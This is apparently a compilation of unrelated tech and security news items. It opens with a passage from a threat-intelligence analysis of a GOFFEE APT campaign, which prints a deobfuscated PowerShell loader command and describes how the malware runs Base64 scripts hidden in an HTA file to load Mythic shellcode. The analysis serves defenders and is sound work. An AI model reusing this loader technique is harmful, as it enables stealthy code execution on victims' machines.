If an HTA file is found on the disk, the script drops two files, “settings.js” and “settings.ps1”, using the “echo” command, and then runs settings.js with additional command-line arguments. The script then sets a timer for 10 seconds, after which the dropped files will be deleted.

Deobfuscated “settings.js”

The running settings.js script accepts three command-line arguments: the path to powershell.exe, the path to the HTA file, and the string “Shell.Application”. These received arguments are used to populate a PowerShell script, the contents of which are then passed to the powershell.exe command line.
powershell.exe -c "$INbqDKHp = \"C:\\\\Users\\\\[username]\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\IE\\\\duplicate````[1````].hta\";$OdfUfjp = get-content $env:USERPROFILE\\settings.ps1;$KWfWXqek=1;Invoke-Expression $OdfUfjp;$KWfWXqek=2;Invoke-Expression $OdfUfjp;$KWfWXqek=3;Invoke-Expression $OdfUfjp;"
The script passed to the PowerShell interpreter declares two variables: “$INbqDKHp”, which stores the path to the HTA file, and “$KWfWXqek”, a counter. The script then reads the contents of “settings.ps1” and executes it three times, passing the path to the HTA file and the counter as arguments, and incrementing the value of the “$KWfWXqek” variable by 1 each time.

Deobfuscated “settings.ps1”

During each execution, the “settings.ps1” script reads the contents of the HTA file, splits it into lines, and identifies Base64-encoded scripts. To detect these scripts, it first locates the line containing the HTA application tag by searching for the substring “<HTA:APPLICATION”. The three lines preceding this tag contain Base64-encoded scripts. Depending on the value of the “$KWfWXqek” counter, the script executes the corresponding Base64-encoded script.
The first two scripts are used to declare auxiliary functions, including compiling a helper DLL, which is necessary for executing the shellcode. The third script is responsible for allocating memory, loading the shellcode from the HTA file (whose path is retrieved from the previously defined “$INbqDKHp” variable), and transferring control to the loaded shellcode, which is the self-configuring code of the Mythic agent.

Victims

According to our telemetry, the identified targets of the malicious activities described in this article are located in Russia, with observed activity spanning from July 2024 to December 2024. The targeted industries are diverse, encompassing organizations in the mass media and telecommunications sectors, construction, government entities, and energy companies.

Attribution

In this campaign, the attacker utilized PowerTaskel, which had previously been linked to the GOFFEE group. Additionally, HTA files and various scripts were employed in the infection chain.

The malicious executable attached to the spear phishing email is a patched version of explorer.exe, similar to what we observed in GOFFEE’s attacks earlier in 2024, and contains shellcode that is very similar to the one previously used by GOFFEE.

Considering the same victimology, we can attribute this campaign to GOFFEE with a high degree of confidence.

Conclusions

Despite using similar tools and techniques, GOFFEE introduced several notable changes in this campaign.

For the first time, they employed Word documents with malicious VBA scripts for initial infection. Additionally, GOFFEE utilized a new PowerShell script downloader, PowerModul, to download PowerTaskel, FlashFileGrabber, and USB Worm. They also began using the binary Mythic agent, and likely developed their own implementations in PowerShell and C.

While GOFFEE continues to refine their existing tools and introduce new ones, these changes are not significant enough to suggest that they can be confused with another actor.

securelist.com/goffee-apt-new-…

The tech press has been full of announcements over the last day or two regarding GPMI. It’s a new standard with the backing of a range of Chinese hardware companies, for a high-speed digital video interface to rival HDMI. The Chinese semiconductor company HiSilicon have a whitepaper on the subject (Chinese language, Google Translate link), promising a tremendously higher data rate than HDMI, power delivery well exceeding that of USB-C, and interestingly, bi-directional data transfer. Is HDMI dead? Probably not, but the next few years will bring us some interesting hardware as they respond to this upstart.

Reading through pages of marketing from all over the web on this topic, it appears to be an early part of the push for 8k video content. There’s a small part of us that wonders just how far we can push display resolution beyond that of our eyes without it becoming just a marketing gimmick, but it is true to say that there is demand for higher-bandwidth interfaces. Reports mention two plug styles: a GPMI-specific one and a USB-C one. We expect the latter to naturally dominate. In terms of adoption, though, and whether users might find themselves left behind with the wrong interface, we would expect that far from needing to buy new equipment, we’ll find that support comes gradually with fallback to existing standards such as DisplayPort over USB-C, such that we hardly notice the transition.

Nearly a decade ago we marked the passing of VGA. We don’t expect to be doing the same for HDMI any time soon in the light of GPMI.

hackaday.com/2025/04/10/everyo…

Un’interruzione di carattere globale ha impedito agli amministratori di accedere a Exchange Admin Center (EAC). Il problema è stato messo immediatamente sotto indagine da parte di Microsoft. Da quando è avvenuta l’interruzione nella giornata di ieri, gli amministratori IT interessati hanno segnalato errori HTTP 500 quando tentavano di accedere al portale dell’interfaccia di amministrazione di Exchange.

Microsoft ha riportato che il problema è critico, il quale è stato portato all’attenzione con il bollettino EX1051697 relativo all’Interfaccia di amministrazione di Microsoft 365. Tuttavia, come suggerito anche da Microsoft, alcuni amministratori sono riusciti ad accedere al centro di amministrazione tramite la url admin.cloud.microsoft/exchange…

Microsoft ha affermato quanto segue: “Abbiamo identificato un aumento dei picchi di errore e stiamo indagando ulteriormente. Inoltre, stiamo esaminando le recenti modifiche apportate al servizio come possibile causa principale”. In un successivo aggiornamento del centro messaggi, Redmond ha affermato che i suoi ingegneri hanno riprodotto internamente il problema e raccolto ulteriori dati diagnostici per agevolare il processo di risoluzione dei problemi.

Per far fronte a questo problema, Microsoft ha iniziato a reindirizzare automaticamente gli amministratori all’URL funzionante come soluzione alternativa temporanea. Successivamente Microsoft ha riportato quanto segue: “Abbiamo identificato un potenziale problema di autenticazione in un percorso URL specifico e stiamo lavorando per mitigare il problema reindirizzando il traffico URL interessato a un URL funzionante”, ha affermato l’azienda in un aggiornamento dell’Interfaccia di amministrazione di Microsoft 365.

Al momento il problema è stato sanato da Microsoft e il servizio ha ripreso a funzionare regolarmente.

L'articolo HTTP 500 su Exchange Admin Center: blackout mondiale, amministratori bloccati! proviene da il blog della sicurezza informatica.

Se ti violano la password, cambi la password. Se ti violano l’impronta digitale, non puoi cambiare il dito.

Fatta questa doverosa premessa, l’autenticazione biometrica sta sostituendo attivamente le password e i codici PIN tradizionali, offrendo un metodo più comodo e, come comunemente si ritiene e affidabile per confermare l’identità. Le impronte digitali, i tratti del viso, la voce e perfino la forma delle orecchie sono diventati parte del moderno panorama digitale.

Tuttavia, la rapida diffusione di tali tecnologie non è stata priva di conseguenze: oltre alla comodità, è aumentato anche il livello di abuso. L’interesse criminale per la biometria non è più ipotetico: i criminali sfruttano sempre più le sue vulnerabilità in attacchi reali.

Secondo i dati di Europol, il numero di casi legati all’inganno dei sistemi biometrici è aumentato in modo significativo. L’attenzione principale degli aggressori è rivolta ai cosiddetti attacchi di presentazione. La loro essenza è la falsificazione o l’imitazione delle caratteristiche biometriche allo scopo di ingannare il sistema di autenticazione.

Un esempio semplice potrebbe essere una replica in silicone di un’impronta digitale realizzata a partire da una fotografia o da un campione fisico. Tali falsi possono essere realizzati in casa utilizzando materiali facilmente reperibili; le moderne stampanti 3D consentono di creare repliche ancora più precise.

Anche i sistemi di riconoscimento facciale si stanno rivelando vulnerabili. I criminali utilizzano maschere in silicone, trucco, algoritmi di morphing software e tecnologie deepfake. Questi ultimi consentono non solo di modificare l’immagine, ma anche di sintetizzare la voce, imitando il discorso di una determinata persona.

Tali metodi vengono utilizzati attivamente per aggirare i sistemi di sicurezza, anche nei servizi bancari e governativi. Ad esempio, si sono verificati casi in cui i deepfake sono stati utilizzati per aggirare l’identificazione nei sistemi di servizi remoti. Come osserva Europol, il vettore dell’abuso non è più limitato alla falsificazione dei dati. Ciò include anche l’estrazione di profili biometrici che possono essere utilizzati a fini di tracciamento, ricatto o addirittura monitoraggio di massa.

Le tecnologie progettate per rafforzare la sicurezza si trasformano in un mezzo di attacco nelle mani dei criminali. Inoltre, una volta compromessi, i dati biometrici non possono essere sostituiti: a differenza di una password, un’impronta digitale o la forma del viso rimangono invariate per tutta la vita.

Per contrastare le nuove minacce Le forze dell’ordine devono andare oltre la risposta tradizionale. Europol sottolinea l’importanza di una stretta collaborazione con ricercatori ed esperti di sicurezza. Lavorando insieme possiamo non solo prevedere i vettori di attacco, ma anche implementare rapidamente misure di protezione. Ciò include il monitoraggio delle minacce, gli aggiornamenti tempestivi degli algoritmi e l’etichettatura e l’analisi obbligatorie degli incidenti correlati all’aggiramento dei sistemi biometrici.

Si propone di prestare particolare attenzione alla sensibilizzazione degli agenti di polizia, degli esperti investigativi e degli specialisti tecnici. Comprendere le specificità degli attacchi biometrici, essere in grado di riconoscere le tracce del loro utilizzo ed essere in grado di lavorare con i dati biometrici durante le indagini sta diventando di fondamentale importanza. Non si tratta solo di proteggere i sistemi, ma anche della qualificazione giuridica di tali reati, che è ancora ben lungi dall’essere perfetta.

Il rapporto di Europol sottolinea che senza una risposta adeguata da parte delle forze dell’ordine, la società rischia di perdere fiducia nella biometria come tecnologia del futuro. In un contesto in cui la criminalità informatica sta raggiungendo nuovi livelli, non servono solo soluzioni tecniche, ma anche l’elaborazione di una strategia chiara che unisca gli sforzi dello Stato, delle imprese e della comunità scientifica. Questo è l’unico modo per mantenere l’equilibrio tra sicurezza e praticità, che era originariamente al centro degli sviluppi biometrici.

L'articolo Il Mito della Biometria Sicura! La Verità Shock sui Nuovi Attacchi Digitali proviene da il blog della sicurezza informatica.

Normally, videos over at The Signal Path channel on YouTube have a certain vibe, namely teardowns and deep dives into high-end test equipment for the microwave realm. And while we always love to see that kind of content, this hop into the world of cryogenics and liquid oxygen production shows that [Shahriar] has other interests, too.

Of course, to make liquid oxygen, one must first have oxygen. While it would be easy enough to get a tank of the stuff from a gas supplier, where’s the fun in that? So [Shahriar] started his quest with a cheap-ish off-the-shelf oxygen concentrator, one that uses the pressure-swing adsorption cycle we saw used to great effect with DIY O₂ concentrators in the early days of the pandemic. Although analysis of the machine’s output revealed it wasn’t quite as capable as advertised, it still put out enough reasonably pure oxygen for the job at hand.

The next step in making liquid oxygen is cooling it, and for that job [Shahriar] turned to the cryocooler from a superconducting RF filter, a toy we’re keen to see more about in the future. For now, he was able to harvest the Stirling-cycle cryocooler and rig it up in a test stand with ample forced-air cooling for the heat rejection end and a manifold to supply a constant flow of oxygen from the concentrator. Strategically placed diodes were used to monitor the temperature at the cold end, a technique we can’t recall seeing before. Once powered up, the cryocooler got down to the 77 Kelvin range quite quickly, and within an hour, [Shahriar] had at least a hundred milliliters of lovely pale blue fluid that passed all the usual tests.

While we’ve seen a few attempts to make liquid nitrogen before, this might be the first time we’ve seen anyone make liquid oxygen. Hats off to [Shahriar] for the effort.

youtube.com/embed/kakZ_fhfUHU?…

hackaday.com/2025/04/09/making…

Vibe coding is the buzzword of the moment. What is it? The practice of writing software by describing the problem to an AI large language model and using the code it generates. It’s not quite as simple as just letting the AI do your work for you because the developer is supposed to spend time honing and testing the result, and its proponents claim it gives a much more interactive and less tedious coding experience. Here at Hackaday, we are pleased to see the rest of the world catch up, because back in 2023, we were the first mainstream hardware hacking news website to embrace it, to deal with a breakfast-related emergency.

Jokes aside, though, the fad for vibe coding is something which should be taken seriously, because it’s seemingly being used in enough places that vibe coded software will inevitably affect our lives. So here’s the Ask Hackaday: is this a clever and useful tool for making better software more quickly, or a dangerous tool for creating software nobody quite understands, containing bugs which could cause a disaster?

Our approach to writing software has always been one of incrementally building something from the ground up, which satisfies the need. Readers will know that feeling of being in touch with how a project works at all levels, with a nose for immediately diagnosing any problems that might occur. If an AI writes the code for us, the feeling is that we might lose that connection, and inevitably this will lead to less experienced coders quickly getting out of their depth. Is this pessimism, or the grizzled voice of experience? We’d love to know your views in the comments. Are our new AI overlords the new senior developers? Or are they the worst summer interns ever?

hackaday.com/2025/04/09/ask-ha…

[BorisDigital] was mesmerised by a modern elevator. He decided to see how hard it would be to design his own elevator based on Raspberry Pis. He started out with a panel for the elevator and a call panel for the elevator lobby. Of course, he would really need three call panels since he is pretending to have a three-floor building.

It all looks very professional, and he has lots of bells and whistles, including an actual alarm. With the control system perfected, it was time to think about the hydraulics and mechanical parts to make a door and an actual lift.

It is still just a model, but he does have 10A AC switches for the pumps. Everything talks via MQTT over WiFi. There’s also a web-based control dashboard. We didn’t count how many Pi boards are in the whole system, but it is definitely more than three.

If you are wondering why this was built, we are too. But then again, we never really need an excuse to go off on some project, so we can’t throw stones.

Want to see a more practical build? Check it out. Perhaps he’ll start on an escalator next.

youtube.com/embed/eTpAalJFUlY?…

hackaday.com/2025/04/09/going-…

This week, Jonathan Bennett and Rob Campbell talk to Stéphane Graber about LXC, Linux Containers, and Incus! Why did Incus fork from LXD, why are Fortune 500 companies embracing it, and why might it make sense for your home lab setup? Watch to find out!

• stgraber.org/feed/
• Incus: linuxcontainers.org/incus
• Online demo: linuxcontainers.org/incus/try-…
• github.com/lxc/incus
• Incus Deploy: github.com/lxc/incus-deploy
• Incus OS: github.com/lxc/incus-os
• Terraform Provider: github.com/lxc/terraform-provi…
• Migration Manager: github.com/futurfusion/migrati…

youtube.com/embed/tiS7QU4ABnY?…

Did you know you can watch the live recording of the show right on our YouTube Channel? Have someone you’d like us to interview? Let us know, or contact the guest and have them contact us! Take a look at the schedule here.

play.libsyn.com/embed/episode/…

Direct Download in DRM-free MP3.

If you’d rather read along, here’s the transcript for this week’s episode.

Places to follow the FLOSS Weekly Podcast:

• Spotify
• RSS

Theme music: “Newer Wave” Kevin MacLeod (incompetech.com)

Licensed under Creative Commons: By Attribution 4.0 License

hackaday.com/2025/04/09/floss-…

The phones most of us carry around in our pockets every day hold a surprising amount of computing power. It’s somewhat taken for granted now that we can get broadband in our hands in most places; so much so that when one of these devices has reached the end of its life it’s often just tossed in a junk drawer even though its capabilities would have been miraculous only 20 years ago. But those old phones can still be put to good use though, and [Denys] puts a few of them back to work running a computing cluster.

Perhaps the most significant flaw of smartphones, though, is that most of them are locked down so much by their manufacturers that it’s impossible to load new operating systems on them. For this project you’ll need to be lucky enough (or informed enough) to have a phone with an unlockable bootloader so that a smartphone-oriented Linux distribution called postmarketOS can be installed. With this nearly full-fledged Linux distribution to work from, the phones can be accessed by ssh and then used to run Kubernetes for the computing cluster. [Denys] has three phones in his cluster that run a few self-hosted services for him.

[Denys] also points out in his guide that having a phone that can run postmarketOS might save some money when compared to buying a Raspberry Pi to run the same service, and the phones themselves can often be more powerful as well. This is actually something that a few others have noted in the past as well. He’s gone into a considerable amount of detail on how to set this up, so if you have a few old smartphones gathering dust, or even those with broken screens or other physical problems where the underlying computing resources are still usable, it’s a great way to put these machines back to work.

Thanks to [mastro Gippo] for the tip!

hackaday.com/2025/04/09/self-h…

Ever wanted your own X-ray machine? Of course you have! Many of us were indoctrinated with enticing ads for X-ray specs and if you like to see what’s inside things, what’s better than a machine that looks inside things? [Hyperspace Pirate] agrees, and he shows you the dangers of having your own X-ray machine in the video below.

The project starts with an X-ray tube and a high voltage supply. The tube takes around 70,000 volts which means you need a pretty stout supply, an interesting 3D printed resistor, and some mineral oil.

The output display? A normal camera. You also need an intensifying screen, which is just a screen with phosphor or something similar. He eventually puts everything in lead and reminds you that this is a very dangerous project and you should probably skip it unless you are certain you know how to deal with X-ray dangers.

Overall, looks like a fun project. But if you want real credit, do like [Harry Simmons] and blow your own X-ray tube, too. We see people build similar machines from time to time. You shouldn’t, but if you do, remember to be careful and to tell us about it!

youtube.com/embed/4NRkFqeO27Y?…

hackaday.com/2025/04/09/you-sh…

The first Philadelphia Maker Faire was extremely impressive, and seemed poised to be one of the premier maker events on the East Coast. Unfortunately, it had the misfortune of happening just a few months before COVID-19 made such events impossible. Robbed of all its momentum, the event tried out different venues after the shadow of the pandemic was gone, but struggled to meet the high bar set by that inaugural outing.

But after attending the the 2025 Philadelphia Maker Faire this past weekend, I can confidently say the organizers have moved the needle forward. This year marks the second time the event has been held at the Cherry Street Pier, a mixed-use public space with an artistic bent that not only lends itself perfectly to the spirit of Maker Faire but offers room for expansion in the future. The pier was packed with fascinating exhibits and excited attendees, and when the dust settled, everyone I spoke to was thrilled with how the day went and felt extremely positive about the future of the Faire.

Providing coverage of an event like this is always difficult, as there’s simply no way I could adequately describe everything there was to see and do. The following represents just a few of the projects that caught my eye; to see all that the Philadelphia Maker Faire has to offer, I’d strongly suggest you make the trip out in 2026.

Wasteworld Toys

Of all the awesome projects I saw during the Faire, the one that stuck with me the most has to be Brett Houser’s Wasteworld Toys. This incredible collection of hand-made remote controlled vehicles invoke the look and feel of the Mad Max universe, but are populated with its own cast of post-apocalyptic characters that come from the depths of Brett’s obviously considerable imagination.

Whether your saw them as pieces of art or electronic marvels, it was impossible not to be impressed with the work Brett put into these builds. While there were some 3D printed parts and cannibalized model kits, much of the raw material used to build the vehicles and characters came from the trash. Brett has an eye for repurposing everyday objects, like taking the metal top from a disposable lighter and turning it into an armored faceplate for one of his Wasteworld warriors.

Beyond being able to simply drive them around, most of the vehicles had some secondary function. One was equipped with an Airsoft cannon, another had a functional flame-thrower, and there was even a mobile rocket launcher that actually fired tiny rockets. They weren’t all weapons of war though: there was a surveillance van that featured a tiny display showing nearby WiFi networks, and a tricked-out station wagon that had an emulated version of Contra running in the back that you could play with a Bluetooth PlayStation controller.

Many of the vehicles featured first person view (FPV) capabilities, with the cameras so expertly hidden on the vehicles and cybernetic characters that at first glance you assume they’re just part of the visual theme and not functional components. To make the experience even more immersive, several vehicles featured displays that were really only visible when looking through the FPV gear, such as digital readouts of the system’s battery voltage.

As impressive as the vehicles of Wasteworld Toys was, it was perhaps Brett himself who left the biggest impression on me. Humble, affable, and eager to share the intricate details of his work, he was even willing to hand the controls of his creations over to attendees, much to their delight. The Wasteworld couldn’t have asked for a better ambassador.

Myelin BCI Board

Hackaday readers may recall the OpenBCI project, which made some headlines about a decade ago with their relatively low-cost development boards for experimenting with brain-computer interfaces (BCIs). We covered a few projects that used their software and hardware, including a flying shark controlled by EEG signals.

It turns out that OpenBCI has now turned their attention to some kind of mixed reality headset that costs as much as a new car, leaving the future of their more hobbyist friendly hardware in question. Which is why Mike Recine has been working on the Myelin, an open source hardware project that continues the legacy of OpenBCI’s early work. Powered by the ESP32, the battery-powered board can wirelessly link to your phone or computer to deliver 16 channels of EEG data.

Mike is hoping to launch a Kickstarter for the hardware soon, offering up assembled and ready-to-use Myelin boards. Kits are also on the horizon, and of course as an open source hardware project, spinning up your own board will be an option as well. The project doesn’t have much of an online presence currently, but interested parties can sign up to be notified when more information goes live.

A Cardboard Table Saw

The ChompSaw is advertised as a “kid-safe power tool for cutting cardboard” but it doesn’t take long to realize that’s selling the machine a bit short. There’s no blade in the machine, instead it uses a small metal piston to rapidly nibble away at the cardboard, a mechanism that co-founder Max Liechty says could be thought of as a “full-auto hole punch.” Even though there’s no blade, the business end of the ChompSaw is still under a protective cover that keeps anything thicker than 3 mm cardboard out. You couldn’t hurt yourself with this machine if you tried.

It rapidly rips through cardboard in any direction, making it easy to follow patterns and cut out complex shapes. Though it was designed primarily for common cardboard (think: all those Amazon boxes you’ve got stacked up), it can chew through other thin materials such as paper, foam, and plastic, opening up even more possibilities.

hackaday.com/wp-content/upload…

The ChompSaw brought in over $1 million during its 2023 Kickstarter campaign, and is available for purchase through their site. While it might not seem like the kind of machine we’d usually get excited about at Hackaday, its ability to cut through foam and other materials holds promise for more practical applications than rainy day arts and crafts. Plus, one should never underestimate the value of CAD: Cardboard Aided Design.

The Sights of Philly Maker Faire

The Road Ahead

In addition to the attendees and exhibitors, I also got the chance to talk to some of the folks behind the Philadelphia Maker Faire. It will probably come as no surprise to hear they all share a passion for discovering and showcasing local talent, and are very excited about the future of the event. There was even some talk about coordinating efforts with other art and tech events in the area such as JawnCon.

Considering they were up against some dreary weather, the organizers were encouraged by the fantastic turnout. Similarly, the venue itself was more than up to the challenge, and should have no trouble supporting the event as it grows. Put simply, the Philadelphia Maker Faire has found its stride, and promises to be even bigger and better next year. If you’re in the Northeast US, this is an event you should keep on your calendar for 2026 and beyond.

Un piccolo ufficio postale nello stato del Kentucky (USA) è diventato il punto di partenza di una delle più grandi operazioni segrete dell’FBI degli ultimi anni. Il 17 settembre 2021, una scatola conteneva quello che sembrava un normale pacco di libri per bambini, ma all’interno del libro c’erano buste contenenti migliaia di dollari in contanti.

Il denaro proveniva da una persona nota come ElonmuskWHM, uno dei principali riciclatori di denaro del darknet che lavorava sulla piattaforma White House Market. I suoi servizi venivano utilizzati da criminali che volevano incassare criptovalute senza passare attraverso piattaforme legali che richiedevano la verifica dell’identità. L’FBI decise non solo di catturarlo, ma anche di impossessarsi dei suoi affari, diventando così la “cassa” del mondo criminale.

Dietro ElonmuskWHM si celava il cittadino indiano trentenne, Anurag Pramod Murarka, che è stato attirato negli Stati Uniti tramite un visto approvato e arrestato all’aeroporto. E poi, per quasi un anno, gli agenti dell’FBI continuarono a condurre affari a suo nome. I clienti non avevano idea che stavano trasferendo criptovalute e ricevendo denaro in cambio di servizi organizzati dall’agenzia di intelligence, che registrava tutto, dagli indirizzi ai collegamenti con altri criminali.

L’operazione ha portato alla scoperta di spacciatori di droga a Miami, rapine a mano armata a San Francisco e hacker criminali, dietro gli attacchi multimilionari. Sotto le mentite spoglie di un ufficio di cambio, gli agenti hanno fatto molto più che limitarsi a osservare: hanno anche fornito denaro agli hacker affinché si rivelassero.

Uno di questi casi riguarda Remington Ogletree. Durante le indagini, ordinò 75.000 dollari tramite Telegram, senza sapere che lo “scambiatore” era già controllato dall’FBI. Il denaro gli è stato inviato con un numero di tracciamento USPS, che ha permesso di stabilire nuovi dettagli sulle sue attività. Ogletree venne successivamente arrestato, ma continuò a lavorare per quasi un anno, ignaro di essere sorvegliato.

Per raggiungere Murarka, gli agenti hanno analizzato la blockchain, cercato corrispondenze nelle domande di visto e utilizzato metodi più controversi. Ad esempio, l’FBI ha chiesto a Google i dati di tutti gli utenti che hanno guardato video di YouTube inviati a un sospettato tramite messaggio di testo, una mossa che ha suscitato critiche per la potenziale violazione dei diritti costituzionali.

Inoltre, gli agenti hanno rintracciato i mittenti del denaro a New York. Uno di loro, nome in codice “Eric“, divenne un informatore dell’FBI. Ha continuato a trasportare denaro contante sotto copertura, utilizzando una telecamera nascosta nel corpo, contribuendo così a identificare i partecipanti al raggiro. Da febbraio a settembre, Eric ha effettuato circa 80 consegne per un valore di oltre 15 milioni di dollari, raccogliendo nuove prove. Il denaro veniva trasportato attraverso negozi, parcheggi e ristoranti, da dove i muli viaggiavano attraverso gli stati.

Videoclip dalla telecamera dell’informatore (404 Media)

Dei documenti relativi a questi episodi non erano sempre collegati a ElonmuskWHM, ma i dettagli (numeri di telefono, date e metodi di azione) erano coerenti. Gli inquirenti ritengono che Murarka abbia integrato il suo piano in un antico sistema di trasferimento di denaro noto come hawala o angadia, adattandolo però alla criptovaluta.

In precedenza Murarka aveva diretto un’azienda di geoinformazione e aveva addirittura inviato agli agenti video su YouTube del suo precedente impiego, ignaro del fatto che ogni suo clic veniva tracciato. Gli investigatori hanno confermato la sua identità basandosi sui dati di Google, Uber, Binance e Apple.

Video di YouTube inviati ai clienti. Ogni video è stato visualizzato rispettivamente circa 2.000 e 1.400 volte (404 Media)

Nel gennaio 2025, il tribunale ha condannato Murarku è stato condannato a 121 mesi (10 anni e 1 mese) di reclusione. Gli inquirenti hanno affermato che Murarka ha fondato uno dei più grandi exchange di criptovalute al mondo, incassando più di 24 milioni di dollari in meno di due anni. Il portavoce dell’FBI ha aggiunto che l’agenzia utilizzerà tutti i mezzi necessari per denunciare le reti criminali, anche se ciò significa riciclare denaro.

L'articolo Il Piccolo Ufficio Postale ha Fregato Mezza Internet! L’operazione sotto copertura dell’FBI proviene da il blog della sicurezza informatica.

Underwater robots face many challenges, not least of which is how to move around. ZodiAq is a prototype underwater soft robot (link is to research paper) that takes an unusual approach to this problem: multiple flexible appendages. The result is a pretty unconventional-looking device that can not only get around effectively, but can do so without disturbing marine life.

ZodiAq sports a soft flexible appendage from each of its twelve faces, but they aren’t articulated like you might think. Despite this, the device can crawl and swim.
With movement inspired by bacterial flagella, ZodiAq moves in an unusual but highly controllable way.
Each soft appendage is connected to a motor, which rotates the attached appendage. This low-frequency but high-torque rotation, combined with the fact that each appendage has a 45° bend to it, has each acting as a rotor. Rotation of the appendages acts on the surrounding fluid, generating thrust. When used together in the right way, these appendages allow the unit to move in a perfectly controllable manner.

This locomotion method is directly inspired by the swimming gait of bacterial flagella (which the paper mentions are regarded as the only example of a biological “wheel”.)

How fast can it go? The prototype covers a distance of two body lengths every fifteen seconds. True, it’s no speed demon compared to a propeller, but it doesn’t disturb marine life or environments as it moves around. This method of movement has a lot going for it. It’s adaptable and doesn’t use all twelve appendages at once; so there’s redundancy built in. If some get damaged or go missing, it can still move, just slower.

ZodiAq‘s design strikes us as a very accessible concept, should any aspiring marine robot hackers wish to give it a shot. We’ve seen other highly innovative and beautiful underwater designs as well, like body-length undulating fins and articulated soft arms.

We do notice that since it lacks a “front” — it might be a challenge to decide how to mount something like a camera. If you have any ideas, share them in the comments.

hackaday.com/2025/04/09/forget…

Sitting in front of a computer all day isn’t exactly what the firmware between our ears was tuned to do. We’re supposed to be hunting and gathering, not hunting and pecking. So anything that makes the computing experience a little more pleasurable is probably worth the effort, and this premium wireless scroll wheel certainly seems to fit that bill.

If this input device seems familiar, that’s because we featured [Engineer Bo]’s first take on this back at the end of 2024. That version took a lot of work to get right, and while it delivered high-resolution scrolling with a premium look and feel, [Bo] just wasn’t quite satisfied with the results. There were also a few minor quibbles, such as making the power switch a little more user-friendly and optimizing battery life, but the main problem was the one that we admit would have driven us crazy, too: the wobbling scroll wheel.

[Bo]’s first approach to the wobble problem was to fit a larger diameter bearing under the scroll wheel. That worked, but at the expense of eliminating the satisfying fidget-spinner action of the original — not acceptable. Different bearings yielded the same result until [Bo] hit on the perfect solution: a large-diameter ceramic bearing that eliminated the wobble while delivering the tactile flywheel experience.

The larger bearing left more room inside for the redesigned PCB and a lower-profile, machined aluminum wheel. [Bo] also had a polycarbonate wheel made, which looks great as is but would really be cool with internal LEDs — at the cost of battery life, of course. He’s also got plans for a wheel machined from wood, which we’ll eagerly await.

youtube.com/embed/tzqJ1rJURgs?…

hackaday.com/2025/04/09/better…

If you want to get started in microfluidic robotics, [soiboi soft’s] salamander is probably too complex for a first project. But it is impressive, and we bet you’ll learn something about making this kind of robot in the video below.

The pneumatic muscles are very impressive. They have eight possible positions using three sources of pressure. This seems like one of those things that would have been nearly impossible to fabricate in a home lab a few decades ago and now seems almost trivial. Well, maybe trivial isn’t the right word, but you know what we mean.

The soft robots use layers of microfluidic channels that can be made with a 3D printer. Watching these squishy muscles move in an organic way is fascinating. For right now, the little salamander-like ‘bot has a leash of tubes, but [soiboi] plans to make a self-contained version at some point.

If you want something modular, we’ve seen Lego-like microfluidic blocks. Or, grab the shrinky dinks.

youtube.com/embed/EeIvIABVTJg?…

hackaday.com/2025/04/08/salama…

An electric typewriter is a rare and wonderful thrift store find, and even better if it still works. Unfortunately, there’s not as much use for these electromechanical beauties, so if you find one, why not follow [Konstantin Schauwecker]’s lead and turn it into a printer?

The portable typewriter [Konstantin] found, a Silver Reed 2200 CR, looks like a model from the early 1980s, just before PCs and word processing software would sound the death knell for typewriters. This machine has short-throw mechanical keys, meaning that a physical press of each key would be needed rather than electrically shorting contacts. Cue the order for 50 low-voltage solenoids, which are arranged in rows using 3D printed holders and aluminum brackets, which serve as heat sinks to keep the coils cool. The solenoids are organized into a matrix with MOSFET drivers for the rows and columns, with snubber diodes to prevent voltage spikes across the coils, of course. A Raspberry Pi takes care of translating an input PDF file into text and sending the right combination of GPIO signals to press each key.

The action of the space bar is a little unreliable, so page formatting can be a bit off, but other than that, the results are pretty good. [Konstantin] even managed to hook the printer up to his typewriter keyboard, which is pretty cool, too.

youtube.com/embed/S7u7vYrCcSE?…

hackaday.com/2025/04/08/dozens…

IBM mainframes are known for very unusual terminals. But IBM made many different things, including the IBM 3151 ASCII terminal, which uses a cartridge to emulate a VT220 terminal. [Norbert Keher] has one and explains in great detail how to connect it to a mainframe.

It had the 3151 personality cartridge for emulating multiple IBM and DEC terminals. However, the terminal would not start until he unplugged it. The old CRT was burned in with messages from an IBM 3745, which helped him work out some of the configuration.

If you’ve only used modern ASCII terminals, you might not realize that many terminals from IBM and other vendors used to use a block mode where the computer would dump a screen to the terminal. You could “edit” the screen (that is, fill in forms or enter lines). Then you’d send the whole screen back in one swoop. This is “block” mode, and some of the terminals the 3151 can emulate are character mode, and others are block mode, which explains its odd keyboard and commands.

[Norbert] gets the terminal running with a virtual mainframe, but along the way, he explains a lot about what’s going on. The video is about an hour long, but it is an hour well spent if you are interested in mainframe history.

Of course, you can always get the real deal to connect. If you don’t have your own virtual mainframe, you are missing out.

youtube.com/embed/V14ac9cRi9Q?…

hackaday.com/2025/04/08/ascii-…

Many years ago, audio equipment came with a tone control, a simple RC filter that would cut or boost the bass to taste. As time passed, this was split into two controls for bass and treble, and then finally into three for bass, mid, and treble. When audiophile fashion shifted towards graphic equalisers, these tone controls were rebranded as “3-band graphic equalisers”, a misleading term if ever we heard one. [Gabriel Dantas] designed one of these circuits, and unlike the simple passive networks found on cheap music centres of old, he’s doing a proper job with active filters.

The write-up is worth a read even if you are not in the market for a fancy tone control, for the basic primer it gives on designing an audio filter. The design contains, as you might expect, a low-pass, a bandpass, and a high-pass filter. These are built around TL072 FET-input op-amps, and an LM386 output stage is added to drive headphones.

The final project is built on a home-made PCB, complete with mains power supply. Audiophiles might demand more exotic parts, but we’re guessing that even with these proletarian components it will still sound pretty good. Probably better than the headphone amplifier featured in a recent project from a Hackaday writer, at least. There’s a build video, below the break.

youtube.com/embed/bzCQj5K0yOU?…

hackaday.com/2025/04/08/design…

Even if you aren’t a Disney fan, you probably know about EPCOT — Experimental Prototype Community of Tomorrow — a Disney attraction that promised a glimpse of the future. [ErnieTech] takes a glimpse at the UNIVAC computer that ran the operation in the 1980s. A lot of schools had UNIVAC 1100-series computers back in those days, so while you don’t hear as much about them as, say, IBM 360s, there are hordes of people who have used the 1100s, even if they don’t remember it.

EPCOT opened in 1982, and it not only ran the attraction but was also visible as part of the exhibit’s ambiance. They even used the Pepper’s Ghost illusion to superimpose a little man on top of the equipment.

Sperry used the relationship with Disney for promotional purposes. We’ve never found a good emulator for the 1100s. The UNIVAC had a 36-bit word and 6-bit characters. We’d love to see something like Hercules that could support Exec 8.

